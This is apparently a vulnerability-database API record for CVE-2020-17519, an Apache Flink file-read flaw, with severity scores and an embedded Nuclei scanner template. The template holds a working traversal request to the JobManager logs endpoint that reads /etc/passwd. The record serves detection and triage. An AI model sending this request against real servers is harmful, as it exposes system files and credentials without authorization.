{"_links":{"capec":{"href":"/api/v1/vulnerability/cve-2020-17519/capec"},"cvss":{"href":"/api/v1/vulnerability/cve-2020-17519/cvss"},"cwe":{"href":"/api/v1/vulnerability/cve-2020-17519/cwe"},"enrichment":{"href":"/api/v1/vulnerability/cve-2020-17519/enrichment"},"gcve":{"href":"/api/v1/vulnerability/cve-2020-17519/gcve"},"self":{"href":"/api/v1/vulnerability/cve-2020-17519"},"sightings":{"href":"/api/v1/sightings/cve-2020-17519"}},"enrichments":{"cisa-kev":{"kev":true},"epss":{"epss":0.97809,"kev":true,"percentile":0.99903},"nuclei":{"nuclei":true,"nuclei_template":"http/cves/2020/CVE-2020-17519.yaml","nuclei_template_severity":"high","nuclei_template_yaml":"id: CVE-2020-17519\n\ninfo:\n  name: Apache Flink - Local File Inclusion\n  author: pdteam\n  severity: high\n  description: Apache Flink 1.11.0 (and released in 1.11.1 and 1.11.2 as well) allows attackers to read any file on the local filesystem of the JobManager through the REST interface of the JobManager process (aka local file inclusion).\n  impact: |\n    Unauthenticated attackers can read arbitrary files from the JobManager local filesystem, potentially exposing sensitive configuration files, credentials, and proprietary data.\n  remediation: |\n    Apply the latest security patches or upgrade to a patched version of Apache Flink to mitigate the vulnerability.\n  reference:\n    - https://github.com/B1anda0/CVE-2020-17519\n    - https://lists.apache.org/thread.html/r6843202556a6d0bce9607ebc02e303f68fc88e9038235598bde3b50d%40%3Cdev.flink.apache.org%3E\n    - https://lists.apache.org/thread.html/r6843202556a6d0bce9607ebc02e303f68fc88e9038235598bde3b50d@%3Cdev.flink.apache.org%3E\n    - https://lists.apache.org/thread.html/r6843202556a6d0bce9607ebc02e303f68fc88e9038235598bde3b50d@%3Cuser.flink.apache.org%3E\n    - https://nvd.nist.gov/vuln/detail/CVE-2020-17519\n  classification:\n    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N\n    cvss-score: 7.5\n    cve-id: CVE-2020-17519\n    cwe-id: CWE-552\n    epss-score: 0.97809\n    epss-percentile: 0.99903\n    cpe: cpe:2.3:a:apache:flink:*:*:*:*:*:*:*:*\n  metadata:\n    max-request: 1\n    vendor: apache\n    product: flink\n  tags: cve,cve2020,apache,lfi,flink,kev,vkev,vuln\n\nhttp:\n  - method: GET\n    path:\n      - \"{{BaseURL}}/jobmanager/logs/..%252f..%252f..%252f..%252f..%252f..%252f..%252f..%252f..%252f..%252f..%252f..%252fetc%252fpasswd\"\n\n    matchers-condition: and\n    matchers:\n      - type: regex\n        part: body\n        regex:\n          - \"root:.*:0:0:\"\n\n      - type: status\n        status:\n          - 200\n# digest: 4a0a00473045022100ddcf7364bdc2a4030c1be8448982b6c7c0f75294118c311b1f96f14d865be4820220020a6e66156bd0a0babc758efc8f70adabf01430a8418d5ddb991169446a3de6:922c64590222798bb761d5b6d8e72950"}},"vuln_id":"cve-2020-17519"}